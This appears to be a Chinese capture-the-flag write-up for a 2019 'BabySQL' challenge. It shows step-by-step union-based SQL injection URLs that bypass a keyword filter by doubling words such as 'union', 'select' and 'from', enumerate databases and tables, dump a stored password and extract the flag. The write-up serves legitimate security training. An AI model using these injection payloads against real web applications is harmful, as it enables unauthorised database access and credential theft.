[极客大挑战 2019]BabySQL 1

[极客大挑战 2019]BabySQL 1

打开实例,源代码审计,发现登录请求check.php页面路径,采用get方法

根据题目可知这是sql注入,尝试万能密码无果

sql 复制代码
?username=admin' or 1=1 --+&password=admin

尝试order by、堆叠注入和union联合注入,发现都无效,怀疑字段被过滤(这边基本确定or被过滤)

尝试双写绕过,成功绕过

sql 复制代码
?username=admin' ununionion seselectlect 1,2,3%23&password=1

确定回显点为2,3

sql 复制代码
?username=1' ununionion seselectlect 1,2,3%23&password=1

爆库,from和infomation被过滤,双写绕过,发现数据库geek和ctf

sql 复制代码
?username=1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata%23&password=1

爆表

双写绕过payload

sql 复制代码
?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="geek"%23&password=1

获得数据表b4bsql,geekuser,双写爆字段

sql 复制代码
?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'%23&password=1

查表数据,发现password也被过滤

sql 复制代码
?username=1' ununionion seselectlect 1,2,concat(id,username,password) frfromom b4bsql%23&password=1

双写绕过

sql 复制代码
?username=1' ununionion seselectlect 1,2,concat(passwoorrd) frfromom b4bsql%23&password=1

获得password: i_want_to_play_2077,提交发现不是正确的flag,转向ctf表

sql 复制代码
?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="ctf"%23&password=1

发现Flag表

爆字段,发现flag字段

sql 复制代码
?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'%23&password=1

查表,显示当前不在数据库ctf中

sql 复制代码
?username=1' ununionion seselectlect 1,2,concat(flag) frfromom Flag%23&password=1

小改一波,flag到手

sql 复制代码
?username=1' ununionion seselectlect 1,2,concat(flag) frfromom ctf.Flag%23&password=1

手**

sql 复制代码
?username=1' ununionion seselectlect 1,2,concat(flag) frfromom ctf.Flag%23&password=1
相关推荐
白鹭19 小时前
MySQL源码部署(rhel7)
数据库·mysql
星期天要睡觉20 小时前
Linux 综合练习
linux·运维·服务器
666和77720 小时前
Struts2 工作总结
java·数据库
saynaihe20 小时前
proxmox8升级到proxmox9
linux·运维·服务器
还听珊瑚海吗20 小时前
SpringMVC(一)
数据库
wanhengidc21 小时前
云手机可以息屏挂手游吗?
运维·网络·安全·游戏·智能手机
码熔burning21 小时前
Spring Security 深度学习(六): RESTful API 安全与 JWT
安全·spring·restful·springsecurity
筑梦之月21 小时前
3分钟解决ZAP打开浏览器闪退问题
web安全